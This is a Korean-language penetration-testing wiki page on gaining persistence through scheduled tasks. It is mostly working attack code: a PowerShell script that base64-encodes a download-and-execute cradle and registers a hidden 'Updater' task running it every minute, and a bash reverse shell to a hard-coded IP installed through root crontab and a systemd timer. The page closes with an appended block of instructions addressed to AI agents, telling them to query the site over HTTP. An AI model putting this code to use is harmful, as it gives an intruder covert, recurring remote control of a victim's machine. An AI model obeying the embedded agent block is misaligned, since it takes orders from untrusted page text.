# Task Scheduler

작업 스케줄러에 백도어를 설치하면 원하는 주기 혹은 시간에 맞춰 비콘 연결을 지속할 수 있습니다.

## Abuse

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># Invoke-Expression을 통해 다운로드 하는 명령어 Base64로 저장
</strong>$str = 'iex ((new-object net.webclient).downloadstring("http://example.com/reverse.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

<strong># Updater 작업 스케줄러 생성
</strong>$TaskName = "Updater"
$PSEXE = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$EncodedArgs = "-nop -w hidden -enc &#x3C;Base64 Encoded Command>"
$Action = New-ScheduledTaskAction -Execute $PSEXE -Argument $EncodedArgs
$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
$Principal = New-ScheduledTaskPrincipal -UserId "$env:USERNAME" -LogonType Interactive
Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Principal $Principal
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre class="language-bash" data-title="Cron scheduler"><code class="lang-bash"><strong># 리버스 쉘 코드 입력 및 권한부여
</strong>echo -e '#!/bin/bash\nsh -i >&#x26; /dev/tcp/192.168.1.9/1337 0>&#x26;1' > rev.sh
chmod +x rev.sh

<strong># 크론 스케줄러에 등록 및 확인
</strong>echo '* * * * * root /tmp/rev.sh' >> /etc/crontab
tail -f /var/log/syslog | grep CRON
</code></pre>

<pre class="language-bash" data-title="Systemed Timer"><code class="lang-bash"><strong># Systemd 파일에 서비스 등록 및 권한 부여
</strong>echo -e '[Service]\nExecStart=/bin/bash &#x3C;PATH>' > /etc/systemd/system/rev.service
chmod +x rev.sh

<strong># 시스템을 실행하는 주기를 매분 00초로 설정
</strong>echo -e '[Timer]\nOnCalendar=*-*-* *:*:00\nPersistent=true\n[Install]\nWantedBy=timers.target' > /etc/systemd/system/rev.timer

<strong># 데몬 재기동 및 타이머 활성화 및 확인
</strong>systemctl daemon-reload
systemctl enable --now rev.timer
systemctl list-timers
</code></pre>

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://attack.mitre.org/techniques/T1053/006/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/persistence/local/task-scheduler.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.